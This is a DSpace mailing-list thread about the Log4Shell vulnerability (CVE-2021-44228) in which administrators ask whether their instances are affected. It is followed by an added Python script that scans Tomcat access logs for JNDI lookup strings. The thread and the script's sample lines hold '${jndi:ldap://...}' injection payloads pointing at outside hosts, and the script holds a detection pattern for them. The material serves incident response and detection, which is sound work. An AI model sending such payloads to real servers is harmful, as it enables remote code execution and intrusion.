Hi,

> I have already found a trace in the tomcat log:

I can also see traces of attempts to exploit this vulnerability in the logs of our 2 DSpace instances (v6.2 and v5.2) so would appreciate a steer on whether DSpace is vulnerable to this particular exploit! And, if so, what action we should take to try and mitigate any risk.

Cheers,

Mike

On Sunday, December 12, 2021 at 6:20:10 PM UTC Plate, Michael wrote:
>
> Hi,
>
> you might have recognized it since Friday:
>
> https://nvd.nist.gov/vuln/detail/CVE-2021-44228
>
> This affects millions of sites.
>
> This is "red alert" status by the Federal Office for Information Security
> of Germany.
>
> We are still running a DSpace 5.10, which uses log4j in version 1.2.17
> (and slf4j-log4j12-1.6.1 ?)
> On Friday, only version > 2.0.0 <= 2.14.1 were known to be vulnerable,
> today also 1.x is sort of vulnerable, but not like 2.x .
>
> I have already found a trace in the tomcat log:
>
> GET /$%7Bjndi:ldap://
> http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 403 -
>
> It is a 403, however a 404 would be nicer :) .
>
> It was not found in the dspace.log, however, a helping answer from someone
> with more in-depth knowledge of DSpace logging could save my holiday.
>
> DSpace 7 contains log4j 2.13.3.
> Solr is already known to be vulnerable, but I cannot make any assumption
> about that based on how DSpace uses it - maybe a search with a string like
> {jndi:ldap://…} can trigger that.
>
> CU
>
> Michael
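A way to find traces like the one quoted above across a whole Tomcat access log, as an added example that is not part of the thread and is not DSpace or Tomcat code. It assumes the AccessLogValve "common" line layout; the sample lines, request paths and the host name scanner.example.invalid are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
# (assumed here; fields logged after %b are scanned as well).
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>.*?)" (?P<status>\d{3}) \S+(?P<rest>.*)$'
)
# Lookup prefix as quoted in the thread, e.g. ${jndi:ldap://
JNDI_RE = re.compile(r'\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:', re.IGNORECASE)


def fully_unquote(text, max_rounds=3):
    """Percent-decode repeatedly so %7B and %257B both end up as '{'."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def scan(lines):
    """Return one record per access-log line that carries a JNDI lookup."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        hit = JNDI_RE.search(fully_unquote(m['request'] + ' ' + m['rest']))
        if hit:
            hits.append({'line': lineno, 'client': m['host'], 'time': m['time'],
                         'status': int(m['status']), 'scheme': hit['scheme'].lower()})
    return hits


# Constructed sample lines (documentation addresses, placeholder host name).
SAMPLE = [
    '192.0.2.10 - - [12/Dec/2021:17:02:11 +0000] "GET /$%7Bjndi:ldap://'
    'scanner.example.invalid/http80path%7D HTTP/1.1" 403 -',
    '192.0.2.11 - - [12/Dec/2021:17:03:40 +0000] "GET /search?query=%2524%257Bjndi'
    ':ldap://scanner.example.invalid/a%257D HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Dec/2021:17:05:02 +0000] "GET /handle/123456789/1 HTTP/1.1" 200 8841',
]

if __name__ == '__main__':
    for h in scan(SAMPLE):
        print(h)
```

A hit shows only that the request reached Tomcat and how it was answered; the status code does not say whether the string was ever passed to a log4j logger, so the application logs and the log4j version in use still have to be checked separately.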
